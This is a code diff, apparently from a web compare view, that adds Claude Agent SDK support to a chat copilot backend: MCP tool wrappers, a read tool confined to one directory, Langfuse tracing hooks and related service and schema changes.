# Merge security hooks with optional tracing hooks
security_hooks = create_security_hooks(user_id, sdk_cwd=sdk_cwd)
tracing_hooks = create_tracing_hooks(tracer)
combined_hooks = merge_hooks(security_hooks, tracing_hooks)
options = ClaudeAgentOptions(
system_prompt=system_prompt,
mcp_servers={"copilot": mcp_server}, # type: ignore[arg-type]
allowed_tools=COPILOT_TOOL_NAMES,
hooks=combined_hooks, # type: ignore[arg-type]
cwd=sdk_cwd,
max_buffer_size=config.claude_agent_max_buffer_size,
model=sdk_model,
env=_build_sdk_env(),
user=user_id or None,
max_budget_usd=config.claude_agent_max_budget_usd,
)
adapter = SDKResponseAdapter(message_id=message_id)
adapter.set_task_id(task_id)
async with tracer, ClaudeSDKClient(options=options) as client:
current_message = message or ""
if not current_message and session.messages:
last_user = [m for m in session.messages if m.role == "user"]
if last_user:
current_message = last_user[-1].content or ""
if not current_message.strip():
yield StreamError(
errorText="Message cannot be empty.",
code="empty_prompt",
)
yield StreamFinish()
return
# Build query with conversation history context.
# Compress history first to handle long conversations.
query_message = current_message
if len(session.messages) > 1:
compressed = await _compress_conversation_history(session)
history_context = _format_conversation_context(compressed)
if history_context:
query_message = (
f"{history_context}\n\n"
f"Now, the user says:\n{current_message}"
)
logger.info(
f"[SDK] Sending query: {current_message[:80]!r}"
f" ({len(session.messages)} msgs in session)"
)
tracer.log_user_message(current_message)
await client.query(query_message, session_id=session_id)
assistant_response = ChatMessage(role="assistant", content="")
accumulated_tool_calls: list[dict[str, Any]] = []
has_appended_assistant = False
has_tool_results = False
async for sdk_msg in client.receive_messages():
logger.debug(
f"[SDK] Received: {type(sdk_msg).__name__} "
f"{getattr(sdk_msg, 'subtype', '')}"
)
tracer.log_sdk_message(sdk_msg)
for response in adapter.convert_message(sdk_msg):
if isinstance(response, StreamStart):
continue
yield response
if isinstance(response, StreamTextDelta):
delta = response.delta or ""
# After tool results, start a new assistant
# message for the post-tool text.
if has_tool_results and has_appended_assistant:
assistant_response = ChatMessage(
role="assistant", content=delta
)
accumulated_tool_calls = []
has_appended_assistant = False
has_tool_results = False
session.messages.append(assistant_response)
has_appended_assistant = True
else:
assistant_response.content = (
assistant_response.content or ""
) + delta
if not has_appended_assistant:
session.messages.append(assistant_response)
has_appended_assistant = True
elif isinstance(response, StreamToolInputAvailable):
accumulated_tool_calls.append(
{
"id": response.toolCallId,
"type": "function",
"function": {
"name": response.toolName,
"arguments": json.dumps(response.input or {}),
},
}
)
assistant_response.tool_calls = accumulated_tool_calls
if not has_appended_assistant:
session.messages.append(assistant_response)
has_appended_assistant = True
elif isinstance(response, StreamToolOutputAvailable):
session.messages.append(
ChatMessage(
role="tool",
content=(
response.output
if isinstance(response.output, str)
else str(response.output)
),
tool_call_id=response.toolCallId,
)
)
has_tool_results = True
elif isinstance(response, StreamUsage):
session.usage.append(
Usage(
prompt_tokens=response.promptTokens,
completion_tokens=response.completionTokens,
total_tokens=response.totalTokens,
)
)
elif isinstance(response, StreamFinish):
stream_completed = True
if stream_completed:
break
if (
assistant_response.content or assistant_response.tool_calls
) and not has_appended_assistant:
session.messages.append(assistant_response)
except ImportError:
logger.warning(
"[SDK] claude-agent-sdk not available, using Anthropic fallback"
)
async for response in stream_with_anthropic(
session, system_prompt, text_block_id
):
if isinstance(response, StreamFinish):
stream_completed = True
yield response
await upsert_chat_session(session)
logger.debug(
f"[SDK] Session {session_id} saved with {len(session.messages)} messages"
)
if not stream_completed:
yield StreamFinish()
except Exception as e:
logger.error(f"[SDK] Error: {e}", exc_info=True)
try:
await upsert_chat_session(session)
except Exception as save_err:
logger.error(f"[SDK] Failed to save session on error: {save_err}")
yield StreamError(
errorText="An error occurred. Please try again.",
code="sdk_error",
)
yield StreamFinish()
finally:
_cleanup_sdk_tool_results(sdk_cwd)
async def _update_title_async(
session_id: str, message: str, user_id: str | None = None
) -> None:
"""Background task to update session title."""
try:
title = await _generate_session_title(
message, user_id=user_id, session_id=session_id
)
if title:
await update_session_title(session_id, title)
logger.debug(f"[SDK] Generated title for {session_id}: {title}")
except Exception as e:
logger.warning(f"[SDK] Failed to update session title: {e}")


@@ -0,0 +1,321 @@
"""Tool adapter for wrapping existing CoPilot tools as Claude Agent SDK MCP tools.
This module provides the adapter layer that converts existing BaseTool implementations
into in-process MCP tools that can be used with the Claude Agent SDK.
"""
import json
import logging
import os
import uuid
from contextvars import ContextVar
from typing import Any
from backend.api.features.chat.model import ChatSession
from backend.api.features.chat.tools import TOOL_REGISTRY
from backend.api.features.chat.tools.base import BaseTool
logger = logging.getLogger(__name__)
# Allowed base directory for the Read tool (SDK saves oversized tool results here)
_SDK_TOOL_RESULTS_DIR = os.path.expanduser("~/.claude/")
# MCP server naming - the SDK prefixes tool names as "mcp__{server_name}__{tool}"
MCP_SERVER_NAME = "copilot"
MCP_TOOL_PREFIX = f"mcp__{MCP_SERVER_NAME}__"
# Context variables to pass user/session info to tool execution
_current_user_id: ContextVar[str | None] = ContextVar("current_user_id", default=None)
_current_session: ContextVar[ChatSession | None] = ContextVar(
"current_session", default=None
)
_current_tool_call_id: ContextVar[str | None] = ContextVar(
"current_tool_call_id", default=None
)
# Stash for MCP tool outputs before the SDK potentially truncates them.
# Keyed by tool_name → full output string. Consumed (popped) by the
# response adapter when it builds StreamToolOutputAvailable.
_pending_tool_outputs: ContextVar[dict[str, str]] = ContextVar(
"pending_tool_outputs", default=None # type: ignore[arg-type]
)
def set_execution_context(
user_id: str | None,
session: ChatSession,
tool_call_id: str | None = None,
) -> None:
"""Set the execution context for tool calls.
This must be called before streaming begins to ensure tools have access
to user_id and session information.
"""
_current_user_id.set(user_id)
_current_session.set(session)
_current_tool_call_id.set(tool_call_id)
_pending_tool_outputs.set({})
def get_execution_context() -> tuple[str | None, ChatSession | None, str | None]:
"""Get the current execution context."""
return (
_current_user_id.get(),
_current_session.get(),
_current_tool_call_id.get(),
)
def pop_pending_tool_output(tool_name: str) -> str | None:
"""Pop and return the stashed full output for *tool_name*.
The SDK CLI may truncate large tool results (writing them to disk and
replacing the content with a file reference). This stash keeps the
original MCP output so the response adapter can forward it to the
frontend for proper widget rendering.
Returns ``None`` if nothing was stashed for *tool_name*.
"""
pending = _pending_tool_outputs.get(None)
if pending is None:
return None
return pending.pop(tool_name, None)
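# Round-trip sketch ("find_agent" is an assumed TOOL_REGISTRY entry): the handler
# created by create_tool_handler() stashes its full output before the SDK CLI can
# truncate it, and the response adapter later retrieves it with this function.
async def _example_stash_round_trip(
    user_id: str | None, session: ChatSession
) -> str | None:
    set_execution_context(user_id, session, None)
    handler = create_tool_handler(TOOL_REGISTRY["find_agent"])
    await handler({"query": "email"})  # full output stashed under "find_agent"
    return pop_pending_tool_output("find_agent")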
def create_tool_handler(base_tool: BaseTool):
"""Create an async handler function for a BaseTool.
This wraps the existing BaseTool._execute method to be compatible
with the Claude Agent SDK MCP tool format.
"""
async def tool_handler(args: dict[str, Any]) -> dict[str, Any]:
"""Execute the wrapped tool and return MCP-formatted response."""
user_id, session, tool_call_id = get_execution_context()
if session is None:
return {
"content": [
{
"type": "text",
"text": json.dumps(
{
"error": "No session context available",
"type": "error",
}
),
}
],
"isError": True,
}
try:
# Call the existing tool's execute method
# Generate unique tool_call_id per invocation for proper correlation
effective_id = tool_call_id or f"sdk-{uuid.uuid4().hex[:12]}"
result = await base_tool.execute(
user_id=user_id,
session=session,
tool_call_id=effective_id,
**args,
)
# The result is a StreamToolOutputAvailable, extract the output
text = (
result.output
if isinstance(result.output, str)
else json.dumps(result.output)
)
# Stash the full output before the SDK potentially truncates it.
# The response adapter will pop this for frontend widget rendering.
pending = _pending_tool_outputs.get(None)
if pending is not None:
pending[base_tool.name] = text
return {
"content": [{"type": "text", "text": text}],
"isError": not result.success,
}
except Exception as e:
logger.error(f"Error executing tool {base_tool.name}: {e}", exc_info=True)
return {
"content": [
{
"type": "text",
"text": json.dumps(
{
"error": str(e),
"type": "error",
"message": f"Failed to execute {base_tool.name}",
}
),
}
],
"isError": True,
}
return tool_handler
def _build_input_schema(base_tool: BaseTool) -> dict[str, Any]:
"""Build a JSON Schema input schema for a tool."""
return {
"type": "object",
"properties": base_tool.parameters.get("properties", {}),
"required": base_tool.parameters.get("required", []),
}
def get_tool_definitions() -> list[dict[str, Any]]:
"""Get all tool definitions in MCP format.
Returns a list of tool definitions that can be used with
create_sdk_mcp_server or as raw tool definitions.
"""
tool_definitions = []
for tool_name, base_tool in TOOL_REGISTRY.items():
tool_def = {
"name": tool_name,
"description": base_tool.description,
"inputSchema": _build_input_schema(base_tool),
}
tool_definitions.append(tool_def)
return tool_definitions
def get_tool_handlers() -> dict[str, Any]:
"""Get all tool handlers mapped by name.
Returns a dictionary mapping tool names to their handler functions.
"""
handlers = {}
for tool_name, base_tool in TOOL_REGISTRY.items():
handlers[tool_name] = create_tool_handler(base_tool)
return handlers
async def _read_file_handler(args: dict[str, Any]) -> dict[str, Any]:
"""Read a file with optional offset/limit. Restricted to SDK working directory.
After reading, the file is deleted to prevent accumulation in long-running pods.
"""
file_path = args.get("file_path", "")
offset = args.get("offset", 0)
limit = args.get("limit", 2000)
    # Security: only allow reads under the SDK tool-results base directory (~/.claude/)
real_path = os.path.realpath(file_path)
if not real_path.startswith(_SDK_TOOL_RESULTS_DIR):
return {
"content": [{"type": "text", "text": f"Access denied: {file_path}"}],
"isError": True,
}
try:
with open(real_path) as f:
lines = f.readlines()
selected = lines[offset : offset + limit]
content = "".join(selected)
return {"content": [{"type": "text", "text": content}], "isError": False}
except FileNotFoundError:
return {
"content": [{"type": "text", "text": f"File not found: {file_path}"}],
"isError": True,
}
except Exception as e:
return {
"content": [{"type": "text", "text": f"Error reading file: {e}"}],
"isError": True,
}
_READ_TOOL_NAME = "Read"
_READ_TOOL_DESCRIPTION = (
"Read a file from the local filesystem. "
"Use offset and limit to read specific line ranges for large files."
)
_READ_TOOL_SCHEMA = {
"type": "object",
"properties": {
"file_path": {
"type": "string",
"description": "The absolute path to the file to read",
},
"offset": {
"type": "integer",
"description": "Line number to start reading from (0-indexed). Default: 0",
},
"limit": {
"type": "integer",
"description": "Number of lines to read. Default: 2000",
},
},
"required": ["file_path"],
}
# Create the MCP server configuration
def create_copilot_mcp_server():
"""Create an in-process MCP server configuration for CoPilot tools.
This can be passed to ClaudeAgentOptions.mcp_servers.
Note: The actual SDK MCP server creation depends on the claude-agent-sdk
package being available. This function returns the configuration that
can be used with the SDK.
"""
try:
from claude_agent_sdk import create_sdk_mcp_server, tool
# Create decorated tool functions
sdk_tools = []
for tool_name, base_tool in TOOL_REGISTRY.items():
handler = create_tool_handler(base_tool)
decorated = tool(
tool_name,
base_tool.description,
_build_input_schema(base_tool),
)(handler)
sdk_tools.append(decorated)
# Add the Read tool so the SDK can read back oversized tool results
read_tool = tool(
_READ_TOOL_NAME,
_READ_TOOL_DESCRIPTION,
_READ_TOOL_SCHEMA,
)(_read_file_handler)
sdk_tools.append(read_tool)
server = create_sdk_mcp_server(
name=MCP_SERVER_NAME,
version="1.0.0",
tools=sdk_tools,
)
return server
except ImportError:
# Let ImportError propagate so service.py handles the fallback
raise
# SDK built-in tools allowed within the workspace directory.
# Security hooks validate that file paths stay within sdk_cwd
# and that Bash commands are restricted to a safe allowlist.
_SDK_BUILTIN_TOOLS = ["Read", "Write", "Edit", "Glob", "Grep", "Bash"]
# List of tool names for allowed_tools configuration
# Include MCP tools, the MCP Read tool for oversized results,
# and SDK built-in file tools for workspace operations.
COPILOT_TOOL_NAMES = [
*[f"{MCP_TOOL_PREFIX}{name}" for name in TOOL_REGISTRY.keys()],
f"{MCP_TOOL_PREFIX}{_READ_TOOL_NAME}",
*_SDK_BUILTIN_TOOLS,
]
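# Example of the resulting allowlist shape (MCP tool names are illustrative):
#   ["mcp__copilot__find_agent", ..., "mcp__copilot__Read",
#    "Read", "Write", "Edit", "Glob", "Grep", "Bash"]
# The "mcp__copilot__" prefix is what the response adapter strips before sending
# tool names to the frontend.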


@@ -0,0 +1,429 @@
"""Langfuse tracing integration for Claude Agent SDK.
This module provides modular, non-invasive observability for SDK sessions.
All tracing is opt-in (only active when Langfuse credentials are configured)
and designed to not affect the core execution flow.
Usage:
async with TracedSession(session_id, user_id) as tracer:
# Your SDK code here
tracer.log_user_message(message)
async for sdk_msg in client.receive_messages():
tracer.log_sdk_message(sdk_msg)
tracer.log_result(result_message)
"""
from __future__ import annotations
import logging
import time
from contextlib import asynccontextmanager
from dataclasses import dataclass, field
from typing import TYPE_CHECKING, Any
from backend.util.settings import Settings
if TYPE_CHECKING:
from claude_agent_sdk import Message, ResultMessage
logger = logging.getLogger(__name__)
settings = Settings()
def _is_langfuse_configured() -> bool:
"""Check if Langfuse credentials are configured."""
return bool(
settings.secrets.langfuse_public_key and settings.secrets.langfuse_secret_key
)
@dataclass
class ToolSpan:
"""Tracks a single tool call for tracing."""
tool_call_id: str
tool_name: str
input: dict[str, Any]
start_time: float = field(default_factory=time.perf_counter)
output: str | None = None
success: bool = True
end_time: float | None = None
@dataclass
class GenerationSpan:
"""Tracks an LLM generation (text output) for tracing."""
text: str = ""
start_time: float = field(default_factory=time.perf_counter)
end_time: float | None = None
tool_calls: list[ToolSpan] = field(default_factory=list)
class TracedSession:
"""Context manager for tracing a Claude Agent SDK session with Langfuse.
Automatically creates a trace with:
- Session-level metadata (user_id, session_id)
- Generation spans for LLM outputs
- Tool call spans with input/output
- Token usage and cost (from ResultMessage)
If Langfuse is not configured, all methods are no-ops.
"""
def __init__(
self,
session_id: str,
user_id: str | None = None,
system_prompt: str | None = None,
model: str | None = None,
):
self.session_id = session_id
self.user_id = user_id
self.system_prompt = system_prompt
self.model = model
self.enabled = _is_langfuse_configured()
# Internal state
self._trace: Any = None
self._langfuse: Any = None
self._user_message: str | None = None
self._generations: list[GenerationSpan] = []
self._current_generation: GenerationSpan | None = None
self._pending_tools: dict[str, ToolSpan] = {}
self._start_time: float = 0
async def __aenter__(self) -> TracedSession:
"""Start the trace."""
if not self.enabled:
return self
try:
from langfuse import get_client
self._langfuse = get_client()
self._start_time = time.perf_counter()
# Create the root trace
self._trace = self._langfuse.trace(
name="copilot-sdk-session",
session_id=self.session_id,
user_id=self.user_id,
metadata={
"sdk": "claude-agent-sdk",
"has_system_prompt": bool(self.system_prompt),
},
)
logger.debug(f"[Tracing] Started trace for session {self.session_id}")
except Exception as e:
logger.warning(f"[Tracing] Failed to start trace: {e}")
self.enabled = False
return self
async def __aexit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None:
"""End the trace and flush to Langfuse."""
if not self.enabled or not self._trace:
return
try:
# Finalize any open generation
self._finalize_current_generation()
# Add generations as spans
for gen in self._generations:
self._trace.span(
name="llm-generation",
start_time=gen.start_time,
end_time=gen.end_time or time.perf_counter(),
output=gen.text[:1000] if gen.text else None, # Truncate
metadata={"tool_calls": len(gen.tool_calls)},
)
# Add tool calls as nested spans
for tool in gen.tool_calls:
self._trace.span(
name=f"tool:{tool.tool_name}",
start_time=tool.start_time,
end_time=tool.end_time or time.perf_counter(),
input=tool.input,
output=tool.output[:500] if tool.output else None,
metadata={
"tool_call_id": tool.tool_call_id,
"success": tool.success,
},
)
# Update trace with final status
status = "error" if exc_type else "success"
self._trace.update(
output=self._generations[-1].text[:500] if self._generations else None,
metadata={"status": status, "num_generations": len(self._generations)},
)
# Flush asynchronously (Langfuse handles this in background)
logger.debug(
f"[Tracing] Completed trace for session {self.session_id}, "
f"{len(self._generations)} generations"
)
except Exception as e:
logger.warning(f"[Tracing] Failed to finalize trace: {e}")
def log_user_message(self, message: str) -> None:
"""Log the user's input message."""
if not self.enabled or not self._trace:
return
self._user_message = message
try:
self._trace.update(input=message[:1000])
except Exception as e:
logger.debug(f"[Tracing] Failed to log user message: {e}")
def log_sdk_message(self, sdk_message: Message) -> None:
"""Log an SDK message (automatically categorizes by type)."""
if not self.enabled:
return
try:
from claude_agent_sdk import (
AssistantMessage,
ResultMessage,
TextBlock,
ToolResultBlock,
ToolUseBlock,
UserMessage,
)
if isinstance(sdk_message, AssistantMessage):
# Start a new generation if needed
if self._current_generation is None:
self._current_generation = GenerationSpan()
self._generations.append(self._current_generation)
for block in sdk_message.content:
if isinstance(block, TextBlock) and block.text:
self._current_generation.text += block.text
elif isinstance(block, ToolUseBlock):
tool_span = ToolSpan(
tool_call_id=block.id,
tool_name=block.name,
input=block.input or {},
)
self._pending_tools[block.id] = tool_span
if self._current_generation:
self._current_generation.tool_calls.append(tool_span)
elif isinstance(sdk_message, UserMessage):
# UserMessage carries tool results
content = sdk_message.content
blocks = content if isinstance(content, list) else []
for block in blocks:
if isinstance(block, ToolResultBlock) and block.tool_use_id:
tool_span = self._pending_tools.get(block.tool_use_id)
if tool_span:
tool_span.end_time = time.perf_counter()
tool_span.success = not (block.is_error or False)
tool_span.output = self._extract_tool_output(block.content)
# After tool results, finalize current generation
# (SDK will start a new AssistantMessage for continuation)
self._finalize_current_generation()
elif isinstance(sdk_message, ResultMessage):
self._log_result(sdk_message)
except Exception as e:
logger.debug(f"[Tracing] Failed to log SDK message: {e}")
def _log_result(self, result: ResultMessage) -> None:
"""Log the final result with usage and cost."""
if not self.enabled or not self._trace:
return
try:
# Extract usage info
usage = result.usage or {}
metadata: dict[str, Any] = {
"duration_ms": result.duration_ms,
"duration_api_ms": result.duration_api_ms,
"num_turns": result.num_turns,
"is_error": result.is_error,
}
if result.total_cost_usd is not None:
metadata["cost_usd"] = result.total_cost_usd
if usage:
metadata["usage"] = usage
self._trace.update(metadata=metadata)
# Log as a generation for proper Langfuse cost/usage tracking
if usage or result.total_cost_usd:
self._trace.generation(
name="claude-sdk-completion",
model=self.model or "claude-sonnet-4-20250514",
usage=(
{
"input": usage.get("input_tokens", 0),
"output": usage.get("output_tokens", 0),
"total": usage.get("input_tokens", 0)
+ usage.get("output_tokens", 0),
}
if usage
else None
),
metadata={"cost_usd": result.total_cost_usd},
)
logger.debug(
f"[Tracing] Logged result: {result.num_turns} turns, "
f"${result.total_cost_usd:.4f} cost"
if result.total_cost_usd
else f"[Tracing] Logged result: {result.num_turns} turns"
)
except Exception as e:
logger.debug(f"[Tracing] Failed to log result: {e}")
def _finalize_current_generation(self) -> None:
"""Mark the current generation as complete."""
if self._current_generation:
self._current_generation.end_time = time.perf_counter()
self._current_generation = None
@staticmethod
def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
"""Extract string output from tool result content."""
if isinstance(content, str):
return content
if isinstance(content, list):
parts = [
item.get("text", "") for item in content if item.get("type") == "text"
]
return "".join(parts) if parts else str(content)
return str(content) if content else ""
@asynccontextmanager
async def traced_session(
session_id: str,
user_id: str | None = None,
system_prompt: str | None = None,
model: str | None = None,
):
"""Convenience async context manager for tracing SDK sessions.
Usage:
async with traced_session(session_id, user_id) as tracer:
tracer.log_user_message(message)
async for msg in client.receive_messages():
tracer.log_sdk_message(msg)
"""
tracer = TracedSession(session_id, user_id, system_prompt, model=model)
async with tracer:
yield tracer
def create_tracing_hooks(tracer: TracedSession) -> dict[str, Any]:
"""Create SDK hooks for fine-grained Langfuse tracing.
These hooks capture precise timing for tool executions and failures
that may not be visible in the message stream.
Designed to be merged with security hooks via merge_hooks(), which
combines matchers for the same event type instead of overwriting them:
hooks = merge_hooks(security_hooks, create_tracing_hooks(tracer))
Args:
tracer: The active TracedSession instance
Returns:
Hooks configuration dict for ClaudeAgentOptions
"""
if not tracer.enabled:
return {}
try:
from claude_agent_sdk import HookMatcher
from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
async def trace_pre_tool_use(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Record tool start time for accurate duration tracking."""
_ = context
if not tool_use_id:
return {}
tool_name = str(input_data.get("tool_name", "unknown"))
tool_input = input_data.get("tool_input", {})
# Record start time in pending tools
tracer._pending_tools[tool_use_id] = ToolSpan(
tool_call_id=tool_use_id,
tool_name=tool_name,
input=tool_input if isinstance(tool_input, dict) else {},
)
return {}
async def trace_post_tool_use(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Record tool completion for duration calculation."""
_ = context
if tool_use_id and tool_use_id in tracer._pending_tools:
tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
tracer._pending_tools[tool_use_id].success = True
return {}
async def trace_post_tool_failure(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Record tool failures for error tracking."""
_ = context
if tool_use_id and tool_use_id in tracer._pending_tools:
tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
tracer._pending_tools[tool_use_id].success = False
error = input_data.get("error", "Unknown error")
tracer._pending_tools[tool_use_id].output = f"ERROR: {error}"
return {}
return {
"PreToolUse": [HookMatcher(matcher="*", hooks=[trace_pre_tool_use])],
"PostToolUse": [HookMatcher(matcher="*", hooks=[trace_post_tool_use])],
"PostToolUseFailure": [
HookMatcher(matcher="*", hooks=[trace_post_tool_failure])
],
}
except ImportError:
logger.debug("[Tracing] SDK not available for hook-based tracing")
return {}
def merge_hooks(*hook_dicts: dict[str, Any]) -> dict[str, Any]:
"""Merge multiple hook configurations into one.
Combines hook matchers for the same event type, allowing both
security and tracing hooks to coexist.
Usage:
combined = merge_hooks(security_hooks, tracing_hooks)
"""
result: dict[str, list[Any]] = {}
for hook_dict in hook_dicts:
for event_name, matchers in hook_dict.items():
if event_name not in result:
result[event_name] = []
result[event_name].extend(matchers)
return result
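For context, here is a minimal sketch of how the pieces above could be wired together in the streaming loop. It only assumes the SDK surface referenced in the commits and docstrings in this compare view (ClaudeAgentOptions with model/hooks, a client exposing query()/receive_messages()); run_traced_turn and security_hooks are hypothetical names standing in for the caller in service.py and the existing security-hooks module.

# Sketch only: run_traced_turn and security_hooks are placeholders, not
# names from this diff; ClaudeAgentOptions/ClaudeSDKClient come from the
# claude_agent_sdk package added in this changeset.
from claude_agent_sdk import ClaudeAgentOptions, ClaudeSDKClient, ResultMessage


async def run_traced_turn(
    session_id: str,
    user_id: str,
    message: str,
    security_hooks: dict,
    model: str | None = None,
) -> None:
    async with traced_session(session_id, user_id, model=model) as tracer:
        tracer.log_user_message(message)
        # merge_hooks keeps matchers for the same event from both dicts;
        # a plain {**security_hooks, **tracing_hooks} would overwrite them.
        hooks = merge_hooks(security_hooks, create_tracing_hooks(tracer))
        options = ClaudeAgentOptions(model=model, hooks=hooks)
        async with ClaudeSDKClient(options=options) as client:
            await client.query(message)
            async for sdk_message in client.receive_messages():
                tracer.log_sdk_message(sdk_message)
                if isinstance(sdk_message, ResultMessage):
                    break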

View File

@@ -245,12 +245,16 @@ async def _get_system_prompt_template(context: str) -> str:
return DEFAULT_SYSTEM_PROMPT.format(users_information=context)
async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:
async def _build_system_prompt(
user_id: str | None, has_conversation_history: bool = False
) -> tuple[str, Any]:
"""Build the full system prompt including business understanding if available.
Args:
user_id: The user ID for fetching business understanding
If "default" and this is the user's first session, will use "onboarding" instead.
user_id: The user ID for fetching business understanding.
has_conversation_history: Whether there's existing conversation history.
If True, we don't tell the model to greet/introduce (since they're
already in a conversation).
Returns:
Tuple of (compiled prompt string, business understanding object)
@@ -266,6 +270,8 @@ async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:
if understanding:
context = format_understanding_for_prompt(understanding)
elif has_conversation_history:
context = "No prior understanding saved yet. Continue the existing conversation naturally."
else:
context = "This is the first time you are meeting the user. Greet them and introduce them to the platform"
@@ -374,7 +380,6 @@ async def stream_chat_completion(
Raises:
NotFoundError: If session_id is invalid
ValueError: If max_context_messages is exceeded
"""
completion_start = time.monotonic()
@@ -459,8 +464,9 @@ async def stream_chat_completion(
# Generate title for new sessions on first user message (non-blocking)
# Check: is_user_message, no title yet, and this is the first user message
if is_user_message and message and not session.title:
user_messages = [m for m in session.messages if m.role == "user"]
user_messages = [m for m in session.messages if m.role == "user"]
first_user_msg = message or (user_messages[0].content if user_messages else None)
if is_user_message and first_user_msg and not session.title:
if len(user_messages) == 1:
# First user message - generate title in background
import asyncio
@@ -468,7 +474,7 @@ async def stream_chat_completion(
# Capture only the values we need (not the session object) to avoid
# stale data issues when the main flow modifies the session
captured_session_id = session_id
captured_message = message
captured_message = first_user_msg
captured_user_id = user_id
async def _update_title():
@@ -800,13 +806,9 @@ async def stream_chat_completion(
# Build the messages list in the correct order
messages_to_save: list[ChatMessage] = []
# Add assistant message with tool_calls if any.
# Use extend (not assign) to preserve tool_calls already added by
# _yield_tool_call for long-running tools.
# Add assistant message with tool_calls if any
if accumulated_tool_calls:
if not assistant_response.tool_calls:
assistant_response.tool_calls = []
assistant_response.tool_calls.extend(accumulated_tool_calls)
assistant_response.tool_calls = accumulated_tool_calls
logger.info(
f"Added {len(accumulated_tool_calls)} tool calls to assistant message"
)
@@ -1237,7 +1239,7 @@ async def _stream_chat_chunks(
total_time = (time_module.perf_counter() - stream_chunks_start) * 1000
logger.info(
f"[TIMING] _stream_chat_chunks COMPLETED in {total_time/1000:.1f}s; "
f"[TIMING] _stream_chat_chunks COMPLETED in {total_time / 1000:.1f}s; "
f"session={session.session_id}, user={session.user_id}",
extra={"json_fields": {**log_meta, "total_time_ms": total_time}},
)
@@ -1408,9 +1410,13 @@ async def _yield_tool_call(
operation_id=operation_id,
)
# Attach the tool_call to the current turn's assistant message
# (or create one if this is a tool-only response with no text).
session.add_tool_call_to_current_turn(tool_calls[yield_idx])
# Save assistant message with tool_call FIRST (required by LLM)
assistant_message = ChatMessage(
role="assistant",
content="",
tool_calls=[tool_calls[yield_idx]],
)
session.messages.append(assistant_message)
# Then save pending tool result
pending_message = ChatMessage(

View File

@@ -814,6 +814,28 @@ async def get_active_task_for_session(
if task_user_id and user_id != task_user_id:
continue
# Auto-expire stale tasks that exceeded stream_timeout
created_at_str = meta.get("created_at", "")
if created_at_str:
try:
created_at = datetime.fromisoformat(created_at_str)
age_seconds = (
datetime.now(timezone.utc) - created_at
).total_seconds()
if age_seconds > config.stream_timeout:
logger.warning(
f"[TASK_LOOKUP] Auto-expiring stale task {task_id[:8]}... "
f"(age={age_seconds:.0f}s > timeout={config.stream_timeout}s)"
)
await mark_task_completed(task_id, "failed")
continue
except (ValueError, TypeError):
pass
logger.info(
f"[TASK_LOOKUP] Found running task {task_id[:8]}... for session {session_id[:8]}..."
)
# Get the last message ID from Redis Stream
stream_key = _get_task_stream_key(task_id)
last_id = "0-0"

View File

@@ -335,11 +335,17 @@ class BlockInfoSummary(BaseModel):
name: str
description: str
categories: list[str]
input_schema: dict[str, Any]
output_schema: dict[str, Any]
input_schema: dict[str, Any] = Field(
default_factory=dict,
description="Full JSON schema for block inputs",
)
output_schema: dict[str, Any] = Field(
default_factory=dict,
description="Full JSON schema for block outputs",
)
required_inputs: list[BlockInputFieldInfo] = Field(
default_factory=list,
description="List of required input fields for this block",
description="List of input fields for this block",
)
@@ -352,7 +358,7 @@ class BlockListResponse(ToolResponseBase):
query: str
usage_hint: str = Field(
default="To execute a block, call run_block with block_id set to the block's "
"'id' field and input_data containing the required fields from input_schema."
"'id' field and input_data containing the fields listed in required_inputs."
)
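To make the updated usage_hint concrete, a hypothetical call shape (the block ID and field names below are made up, not taken from this diff): block_id comes from a BlockInfoSummary's 'id' field, and input_data supplies the fields listed in required_inputs.

# Hypothetical example of the run_block arguments the usage_hint describes.
run_block_args = {
    "block_id": "example-block-id",
    "input_data": {
        "url": "https://example.com",   # a field from required_inputs
        "max_results": 10,              # another field from required_inputs
    },
}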

View File

@@ -897,6 +897,29 @@ files = [
{file = "charset_normalizer-3.4.4.tar.gz", hash = "sha256:94537985111c35f28720e43603b8e7b43a6ecfb2ce1d3058bbe955b73404e21a"},
]
[[package]]
name = "claude-agent-sdk"
version = "0.1.35"
description = "Python SDK for Claude Code"
optional = false
python-versions = ">=3.10"
groups = ["main"]
files = [
{file = "claude_agent_sdk-0.1.35-py3-none-macosx_11_0_arm64.whl", hash = "sha256:df67f4deade77b16a9678b3a626c176498e40417f33b04beda9628287f375591"},
{file = "claude_agent_sdk-0.1.35-py3-none-manylinux_2_17_aarch64.whl", hash = "sha256:14963944f55ded7c8ed518feebfa5b4284aa6dd8d81aeff2e5b21a962ce65097"},
{file = "claude_agent_sdk-0.1.35-py3-none-manylinux_2_17_x86_64.whl", hash = "sha256:84344dcc535d179c1fc8a11c6f34c37c3b583447bdf09d869effb26514fd7a65"},
{file = "claude_agent_sdk-0.1.35-py3-none-win_amd64.whl", hash = "sha256:1b3d54b47448c93f6f372acd4d1757f047c3c1e8ef5804be7a1e3e53e2c79a5f"},
{file = "claude_agent_sdk-0.1.35.tar.gz", hash = "sha256:0f98e2b3c71ca85abfc042e7a35c648df88e87fda41c52e6779ef7b038dcbb52"},
]
[package.dependencies]
anyio = ">=4.0.0"
mcp = ">=0.1.0"
typing-extensions = {version = ">=4.0.0", markers = "python_version < \"3.11\""}
[package.extras]
dev = ["anyio[trio] (>=4.0.0)", "mypy (>=1.0.0)", "pytest (>=7.0.0)", "pytest-asyncio (>=0.20.0)", "pytest-cov (>=4.0.0)", "ruff (>=0.1.0)"]
[[package]]
name = "cleo"
version = "2.1.0"
@@ -2593,6 +2616,18 @@ http2 = ["h2 (>=3,<5)"]
socks = ["socksio (==1.*)"]
zstd = ["zstandard (>=0.18.0)"]
[[package]]
name = "httpx-sse"
version = "0.4.3"
description = "Consume Server-Sent Event (SSE) messages with HTTPX."
optional = false
python-versions = ">=3.9"
groups = ["main"]
files = [
{file = "httpx_sse-0.4.3-py3-none-any.whl", hash = "sha256:0ac1c9fe3c0afad2e0ebb25a934a59f4c7823b60792691f779fad2c5568830fc"},
